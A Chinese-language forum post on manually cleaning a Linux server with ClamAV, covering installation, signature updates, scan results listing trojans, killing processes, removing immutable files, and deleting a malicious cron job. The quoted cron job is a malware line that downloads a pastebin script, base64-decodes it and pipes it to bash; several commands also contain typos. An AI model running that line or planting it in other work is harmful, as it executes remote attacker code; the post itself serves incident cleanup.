ClamAV手工杀毒

admin 10月前 540

1ClamAV介绍

ClamAV是一个在命令行下查毒软件,因为它不将杀毒作为主要功能,默认只能查出您计算机内的病毒,但是无法清除,至多删除文件。ClamAV可以工作很多的平台上,但是有少数无法支持,这就要取决您所使用的平台的流行程度了。另外它主要是来防护一些WINDOWS病毒和木马程序。另外,这是一个面向服务端的软件。

ClamAV的官方下载地址为http://www.clamav.net/download.html 我直接使用wget下载源码安装文件。

相关使用参考http://wiki.ubuntu.org.cn/ClamAV

 

2、安装ClamAV

tar zxvf clamav-0.104.1.tar

cd clamav-0.104.1

./setup.sh

或者

sudo apt-get install clamav

3、升级病毒库:

sudo  freshclam

4clamscan.扫描病毒

这里附带一些例子

扫描所有用户的主目录就使用 clamscan -r /home

扫描您计算机上的所有文件并且显示所有的文件的扫描结果,就使用 clamscan -r /

扫描您计算机上的所有文件并且显示有问题的文件的扫描结果, 就使用 clamscan -r --bell -i /

如果不知道木马可能的位置就全盘扫吧,时间较长,可以放在晚上扫

clamscan -r --bell -i /

/lib/libudev.so: Unix.Trojan.DDoS_XOR-1 FOUND

/lib/lib3.so.1: Linux.Trojan.Agent FOUND

/usr/bin/jjhltwoxvs: Unix.Trojan.DDoS_XOR-1 FOUND

----------- SCAN SUMMARY -----------

Known viruses: 4059163

Engine version: 0.98.7

Scanned directories: 1300819

Scanned files: 13315360

Infected files: 4

Total errors: 14433

Data scanned: 401706.34 MB

Data read: 788612.48 MB (ratio 0.51:1)

Time: 52742.298 sec (879 m 2 s)

以上标红的就是发现的病毒文件。

 

使用file /lib/libudev.so查看可以看到,都是可执行文件。

木马清理

rm -rf /lib/libudev.so  (删除木马程序)

rm -f /tmp/gates.lock 进程号

解决:可以删除后立马自己创建一个并设置不允许修改。

如:

rm /etc/cron.hourly/gcc.sh

touch /etc/cron.hourly/gcc.sh

chattr +i /etc/cron.hourly/gcc.sh

注:chattr +i :设定文件不能被删除、改名、设定链接关系,同时不能写入或新增内容

若以上也不行,那么就破坏掉木马文件,木马的监控进程发现文件存在应该不会重新创建,故可以破坏掉:

杀死可疑进程:

使用top查看到有可以进程


使用clamscn进行病毒扫描

kill -9 27232 杀掉进程

ps aux|grep kworker|grep -v grep|cut -c 9-15|xargs kill -9

几个命令:

"ps - ef"linux 里查看所有进程的命令。这时检索出的进程将作为下一条命令"grep mcfcm_st"的输入。

"grep mcfcm_st"的输出结果是,所有含有关键字"mcfcm_st"的进程,这是Oracle数据库中远程连接进程的共同特点。

"grep -v grep"是在列出的进程中去除含有关键字"grep"的进程。

"cut -c 9-15"是截取输入行的第9个字符到第15个字符,而这正好是进程号PID

"xargs kill -9"中的xargs命令是用来把前面命令的输出结果(PID)作为"kill -9"命令的参数,并执行该令。

然后用clamsan -r --beli -i /usr/bin/kworker --remove将病毒清理掉

如果tmp文件下文件没有用的话

rm -rf /tmp/*  删除掉所有文件

但是执行的过程中发现一些文件不能被删除,提示没有权限,什么???

仔细分析发先了问题之所在,原来文件自带i属性,难怪删不了。

lsattr命令,问题就有了答案。

秘密终于暴露了,在lsattr命令下,t文件带有一个"i"的属性,所以才不可以删除,这个属性专门用来保护重要的文件不被删除,通常的情况下,懂得用这几个命令的

i :这个i可就很厉害了。它可以让一个文件不能被删除、改名,设置连接也无法写入或添加据。对于系统安全性有相当大的

帮助。只有root能设置此属性。

通常系统管理员有能力判断这个文件是否可以被删除。

详细参考:https://blog.csdn.net/JJuStudent/article/details/72805676

于是执行chattr -i thisxxs去掉i属性,之后就可完美删除掉。

清除定时任务

病毒进程会过一段时间重新启动,于是想到有定时任务,执行crontab -l发现果然有定时任务如下:
定时任务内容如下:

* /23 * * * *   (curl -fsSL https://pastebin.com/raw/Gw7mywhC || wget -q-O- https://pastebin.com/raw/Gw7mywhC)|base64 -d |/bin/bash

在执行crontab -r或者crontab -e删除和修改定时任务时,发现和上面一样,有i属性,不能操作。去掉i属性后即可删除掉定时任务。

定时任务被删除干净:



最新回复 (5)
返回
发新帖